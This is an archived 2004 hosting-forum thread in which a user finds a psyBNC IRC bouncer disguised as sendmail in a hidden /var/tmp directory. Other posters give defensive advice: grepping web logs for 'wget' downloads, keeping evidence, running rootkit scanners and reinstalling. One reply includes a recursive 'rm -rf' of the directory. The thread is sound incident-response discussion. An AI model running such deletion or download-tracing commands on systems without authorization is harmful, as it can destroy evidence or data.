Results 1 to 9 of 9
-
04-16-2004, 02:25 AM #1Junior Guru Wannabe
- Join Date
- Oct 2002
- Posts
- 59
found psyBNC in my server under 1 acc
what should i do ?
and i can't go to that directory.
what should i do
quote:
--------------------------------------------------------------------------------
gorgole was running [psyBNC] the process claimed to be [sendmail:
accepting connections
? c-leet]
The binary is located at: /var/tmp/.../vi
gorgole was running [psyBNC] the process claimed to be [sendmail:
accepting connections
? c-leet]
The binary is located at: /var/tmp/.../vihttp://www.adwis.net
-
04-16-2004, 02:39 AM #2Web Hosting Master
- Join Date
- Jun 2003
- Location
- UK
- Posts
- 6,616
Kick the user, delete the account check if the server has been comprimised
RusRuss Foster - Industry Curmudgeon
Freelance Sysadmin for Hire - email vaserv@gmail.com
-
04-16-2004, 02:42 AM #3Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
/var/tmp/.../vi
that doesnt look to good. Do you have an old kernel on the box? Have you secured the server any? Do you get anything when you run:
for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
04-16-2004, 03:05 AM #4Junior Guru Wannabe
- Join Date
- Oct 2002
- Posts
- 59
i dont know how to delete & clean this problem.
do you have any step by step instruction, please..http://www.adwis.net
-
04-16-2004, 03:11 AM #5Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Well unfortuantly its not a step by step thing. You could be rooted and have a backdoor, or it could be simple and just as a user. But in any case you should setup some measures to help prevent this in the future.
it can be as simple as rm -rf /var/tmp/.../ BUT i seriously suggest you hire someone to check it out before you remove the files so they can evaluate whats going on. There are many companys out there that can do this.
serverwizards
easyservermanagement
wemanageservers
rackaid
etcSteven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
04-16-2004, 06:26 PM #6I Squash Server Problems
- Join Date
- Apr 2001
- Location
- FL, USA
- Posts
- 949
Do not just remove the files!!! Those files are clues to when and who placed the bot on your system. If you must stop the bot immediately, dump netstat and ps screens to a text file. They can all be very useful in diagnosing who put the file on your system and when it was started. Also, hackers like to call files one thing when they actually do another.
In this situation, you should verify the inegrity of netstat and check for unusually ports. An external portscan would be useful as well in case there are modules altering the netstat results.
If the owner of the file is apache or root, then you may have been hacked. Tools like chkrootkit and rkhunter can be helpful but do not subsitute for a throrough security scan.
We save you time, money, and frustration by handling the server management tasks required to run an online business successfully.
No prodding required. We just do it right the first time. Red Hat, MySQL, Plesk, and cPanel certified staff.
-
04-16-2004, 06:41 PM #7Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Huck it depends on the control panel as to what the file will be owned by, for example cpanel's apache runs as the user nobody.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
04-16-2004, 07:03 PM #8I Squash Server Problems
- Join Date
- Apr 2001
- Location
- FL, USA
- Posts
- 949
Yeah, I know that. I should have been more specific and said owned by the apache's user id or group id. I was speaking of apache in a generic sense. I've seen many different uid's for apache including but not limited to:
apache
httpd
http
httpdssl
httpds
admserv
server
and a few more......
We save you time, money, and frustration by handling the server management tasks required to run an online business successfully.
No prodding required. We just do it right the first time. Red Hat, MySQL, Plesk, and cPanel certified staff.
-
04-17-2004, 10:33 AM #9Retired Moderator
- Join Date
- Mar 2004
- Location
- Singapore
- Posts
- 6,990
I suggest just reformat and reinstall to be 100% safe , u wont know if u have backdoors